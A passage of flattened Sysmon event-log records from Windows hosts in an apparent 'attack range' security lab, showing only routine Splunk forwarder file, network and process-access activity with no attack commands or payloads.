Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAD5A62905389916715934EF3F73A934,SHA256=3D775B1F75FB0594F0B4EA410A125E42C1BF2206EAD5DE55D2A95436B7EBAD7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:09.091{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAE02B95EBBADC3BA357B936D92796F1,SHA256=6FF4A6AD2178D1D6A55B7363E01AED570AA77F41F542F567B647C32503460B68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:10.106{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A309640D8F1C5D9E46F3B170CB47B371,SHA256=3098B00648F9AA04CCEBEBE1B25FE4A2B55EC35276B99E603E34EAA5B88B9165,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214297Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:10.045{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7B85504EA862FEA314F6BD57D09ABA9,SHA256=FD184076741E75D190175B7BF169E1F0CB7CD7AFD7564D4E31BBDC12CF7B1214,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:09.630{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53233-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:11.122{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=005A804D114CAD0E80E884FFC6205181,SHA256=2B8A9D97486D719791491DFC45ECFF59B82267685625AE43EE4856B62CA0E37E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214299Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:09.562{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51179-false10.0.1.12-8000- 23542300x8000000000000000214298Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:11.046{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1281117A0F77900E2AD74AA12C5C9219,SHA256=78EC81133F2A2F3A434D285F358D3715BE492DCBCE171CDD562F122A8537240C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214300Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:12.076{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9826CEA6752B36F8025973D1FED6103,SHA256=D8FC86F1C9703492234D34AB381C639D72F33571E01831DB136DC34B3A408697,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:12.138{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=381145C28D700C5E7D69BF44DEBC9AE4,SHA256=4FA763F2CE32E507372B2B730A4B9B9DD512322F55AB1927B00B33E90608A5CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214301Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:13.294{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=901F1FA25A15C319AB8F91AEE06ACD1E,SHA256=FD3E8817B67F5F404A01386F58DD9FC4018E62EEDC14C3057C3D8E3D3705917B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:13.153{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3702FB999A3C7BB3670743CB2F2D4D94,SHA256=253E8E6E80C66C36A24501C1A01F7750EF12B804F0E515B2AD83A3AC5FBFA351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214302Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:14.341{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BEB6FA1E0068CD13CE69561C572AF5DC,SHA256=6123E59523DB7761F896A44CDA5A10E03DF4830CC9A258BEC9F7CDBE146E6122,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285174Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:14.169{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9601A4FF63EB8CC337375B5DAA376ED6,SHA256=94AD7E9DC89103BAC3058A34673A2FF733448BEC1A830FC3B354E80FA6D24690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214303Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:15.482{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=087A09DCCB45AF4B9F3CC89339F97C0F,SHA256=042738DC78FD487742F86E0CED39C0959125AD071B00D96F04088EB0DAB8CE35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285175Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:15.294{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F09E9FF1BE39ABF02D998DE395D37DC,SHA256=618F6EBBE3F61C727AE66A2A0D273696353E346E0CE7CD5DD626CA528E91C76A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214305Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:14.660{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51180-false10.0.1.12-8000- 23542300x8000000000000000214304Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:16.607{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D2DC245F7D65A5104A7A0D86A40AE8D,SHA256=B3BB117842BCBC5A5EF40BD94EC119DF7C7A9019B233AFD3F9546E451CB81817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285176Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:16.325{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F75BAAB81DF35736EEB874059A981EA,SHA256=081DA7D04358DFA752BB5B9399717DE691590AA08D743E5171FAAD857F3FC9E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214306Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:17.669{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6182B7324B26A74157BEB4AB5F30C7D0,SHA256=4FA6C1B90DF432BE63352654C94C898B2B206134F7871602CBDCDF208AB08691,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285177Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:17.341{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED9E5AFFCF3F0ED2B9A98E1E60C3990D,SHA256=C1651D9DC25113B05BBE9ADF51E467497A1B0DD362C19CF10A0853F4A9AFDE2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214307Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:18.904{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBE9DC1F132BB27ECCE9AA9211A8B78C,SHA256=B0B22AB86F0A1A9FC96989D79A3ACB736ED069D1F825538BD062A8BA1206C458,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285179Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:18.435{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92DB0B6ED1414ACFF8983E31DB4A4419,SHA256=399E771E0AD5552BF1BCFF90E88A7C170B04E9F3693869D4F8474A5DECBF66F9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285178Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:15.583{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53234-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214308Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:19.951{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B82092F1F79E17DEF6A0764BC2A66596,SHA256=DF6AD45F8DEB2286B78B2929FCD9275BF6AB4C6C929341DAFB8D25BDD77AF42E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285197Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E5F-6216-A904-000000003802}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285196Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285195Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285194Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285193Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285192Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0E5F-6216-A904-000000003802}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285191Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.981{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E5F-6216-A904-000000003802}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285190Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.982{C8EA50B7-0E5F-6216-A904-000000003802}4824C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285189Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.764{C8EA50B7-0E5F-6216-A804-000000003802}2372420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285188Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.497{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=486C304911DFB5A835286A1E3DDEB545,SHA256=DD3B66A6E1061BFA79312109B7A463357030F32B59B8CE91E054655EE8156259,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285187Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.481{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E5F-6216-A804-000000003802}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285186Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.481{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285185Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.481{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285184Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:19.481{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285183Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 